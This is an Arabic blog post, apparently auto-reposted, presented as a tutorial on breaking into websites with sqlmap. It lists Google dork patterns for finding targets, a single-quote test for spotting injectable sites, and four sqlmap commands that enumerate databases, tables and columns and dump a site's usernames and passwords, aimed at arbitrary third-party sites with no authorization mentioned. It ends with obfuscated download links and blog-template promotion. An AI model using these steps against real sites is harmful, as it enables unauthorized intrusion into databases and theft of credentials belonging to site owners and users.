32-أختراق المواقع بأداة sqlmap: --روهاك

مواضيع مفضلة

32-أختراق المواقع بأداة sqlmap: --روهاك

اليوم شرحنا عن أداة sqlmap

  • تعريفها : هي أداة مخصصة لأختراق المواقع المصابة يثغرة SQL اي يمكن أختراقها عن طريق هذه الأداة ..
  • الأوامر :
  1. git clone https://github.com/sqlmapproject/sqlmap
  2. cd sqlmap 
  3. ls
  4. chmod +x sqlmap.py
  5. pyhthon2 sqlmap.py
  • عندما تفتح الاداة تحتاج اولا الى دوركات اي الى نهايات الموقع ..
  • اي عندما تخترق هذا النوع من المواقع يجب ان تكون نهايته على الشكل التالي وتسمى دوركات(Dork) :
  • دوركات: 
  • Dork
  • ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  • "page.php?id="
  • "trainers.php?id="
  • "article.php?ID="
  • "games.php?id="
  • "newsDetail.php?id="
  • "staff.php?id="
  • "products.php?id="
  • "news_view.php?id="
  • "opinions.php?id="
  • "pages.php?id="
  • "prod_detail.php?id="
  • لأيجاد موقع مصاب يجب عليك ان تنسخ احد الدوركات وتكتبه في بحث  Google وستظهر عدة مواقع ..لتعرف اي واحدة منها مصابة يجب ان تنسخ رابط الموقع وتكتب بعده هذه النقطة( ’ ) اذا ظهرت لك رسالة ما او شاشة بيضاء فيها كتابة على شكل مشفر فيكون هنا النوقع مصاب ...
  • لبدء الأختراق: 
  • تنسخ رابط الموقع المراد اختراقه ..وتكتب هذه الاوامر ...

الخطوة الأولى:
python2 sqlmap.py -u (websaite) --dbs s-- level=3 --risk=3 --batch
_________________________________________
الخطوة الثانية:
python2 sqlmap.py -u (website) -D (name_dataase) --tables --level=3 --risk=3 --batch
__________________________________________
الخطوة الثالثة:
python2 sqlmap.py -u (websit) -D (NAME_database) -T (name_table) --columns --level=3 --risk=3 --batch
__________________________________________
الخطوة الرابعة والأخيرة :
python2 sqlmap.py -u (websit) -D (NAME_database) -T (NAME_table) -C (NAME_column) --dump --level=3 --risk=3 --batch

----------------------------------------------------------------
ملاحظة: مكان كلمة ( (websit) تضع رابط الموقع
ومكان كلمة (datsbases) تنسخ الاسم الذي يظهر في قائمة database وعند اكمال جميع الخطوات سيتم اظهار الاسم والكلمة الخاصة بالموقع وينم الاختراق بنجاح واذا لم تفهمو جيدا شاهدوا هذا الفيديو:
ا الشرح عن اختراق المواقع
باستخدام اداه Sqlmap - Optiva
طبعا دول اللي هنشرح بيهم النهرده بالدليل عن اختراق موقع

ثانيا دا رابط الشرح : https://*vime*o.com/26860*7673

ثالثا دا رابط تحميل ملف الاوامر المطلوبه في الشرح : http://g*sul.me*/b7Y1

فقط انسخ الرابط واحذف النجوم(*) وشكرا لكم اتمنى لكم التوفيق
أسطورة رجل بلا قانون ...


  • روابط التحميل والمشاهدة، الروابط المباشرة للتحميل من هنا
---------------------------------------------------------------
شاهد هذا الفيديو القصير لطريقة التحميل البسيطة من هنا
كيف تحصل على مدونة جاهزة بآلاف المواضيع والمشاركات من هنا شاهد قناة منتدى مدونات بلوجر جاهزة بألاف المواضيع والمشاركات على اليوتيوب لمزيد من الشرح من هنا رابط مدونة منتدى مدونات بلوجر جاهزة بآلاف المواضيع والمشاركات في أي وقت حــــتى لو تم حذفها من هنا شاهد صفحة منتدى مدونات بلوجر جاهزة بألاف المواضيع والمشاركات على الفيس بوك لمزيد من الشرح من هنا تعرف على ترتيب مواضيع منتدى مدونات بلوجر جاهزة بآلاف المواضيع والمشاركات (حتى لا تختلط عليك الامور) من هنا
ملاحظة هامة: كل عمليات تنزيل، رفع، وتعديل المواضيع الجاهزة تتم بطريقة آلية، ونعتذر عن اي موضوع مخالف او مخل بالحياء مرفوع بالمدونات الجاهزة بآلاف المواضيع والمشاركات، ولكم ان تقوموا بحذف هذه المواضيع والمشاركات والطريقة بسيطة وسهلة. ــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــسلامـ.

إرسال تعليق

المشاركة على واتساب متوفرة فقط في الهواتف